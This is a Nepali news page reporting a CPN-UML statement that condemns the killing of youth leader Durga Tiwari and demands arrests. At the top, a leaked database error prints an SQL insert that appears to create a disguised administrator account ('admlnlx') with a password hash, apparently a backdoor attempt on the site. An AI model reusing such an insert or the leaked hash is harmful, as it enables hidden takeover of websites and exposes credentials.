WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc415Bdsj5uTGtpJM.ByPvxPy..rZm.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 20:33:20', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ४–
नेकपा एमालले युवा संघ नेपालका रुपन्देही जिल्ला अध्यक्ष तथा नेकपा (एमाले) क्षेत्रीय कमिटी सदस्य दुर्गा तिवारीको हत्यारालाई तत्काल पक्राउ गरि कारवाही प्रक्रिया अघि बढाउन माग गरेको छ ।
महासचिव इश्वर पोखरेलद्धारा आज साँझ जारी विज्ञप्तीमा हत्याको तीब्र भत्सर्ना र निन्दा गर्दै त्यसमा संलग्न अपराधीहरुलाई तुरुन्त गिरफ्तार गरी कडा कानुनी कारवाही गर्न जोडदार माग गरिएको छ । युवा संघका अध्यक्ष तिवारीको आज अपरान्ह रुपन्देहीको देवदह नगरपालिका–६, खैरेनीमा हिँडिरहेको बेला मोटरसाइकलमा आएका दुईजना अपराधीले गोली हानी हत्या थिए ।
नेकपा एमालले प्रधानमन्त्री पुष्पकमल दाहाल स्वयम्ले नेकपा (एमाले) र आन्दोलनरत जनताविरुद्ध उत्तेजनापूर्ण अभिव्यक्ति दिइरहेको तथा गृहमन्त्रीले उक्साहटपूर्ण भनाइ राखिरहेको बेला देशभक्त युवा नेताको हत्या भएको जनाएको । देश र जनताको सुरक्षा गर्नुपर्ने व्यक्तिहरुको त्यस्तो उत्तेजना र उक्साहटपूर्ण अभिव्यक्ति सार्वजनिक भएकै बेला यो देशभक्त नेपालीहरुमाथि गरिएको षड्यन्त्रपूर्ण आक्रमण भएको एमालेले आरोप लगाएको छ ।
यस्तै एमालेले हत्या र षड्यन्त्रको पर्दाफास गर्दै संयम र धैर्यका साथ राष्ट्र, राष्ट्रियता, संविधान कार्यान्वयन र अग्रगमनको यात्रामा अविचलित सक्रियताका साथ भएर लागिरहन कार्यकर्ता पंक्तिलाई आग्रह गरेको छ । यस्तै एमालेले हत्या अध्यक्ष तिवारी तिवारीप्रति श्रद्धाञ्जली अर्पण गर्दै शोकसन्तप्त परिवारजन एवम् पार्टी र युवा पंक्तिमा गहिरो समवेदना प्रकट गरेको छ ।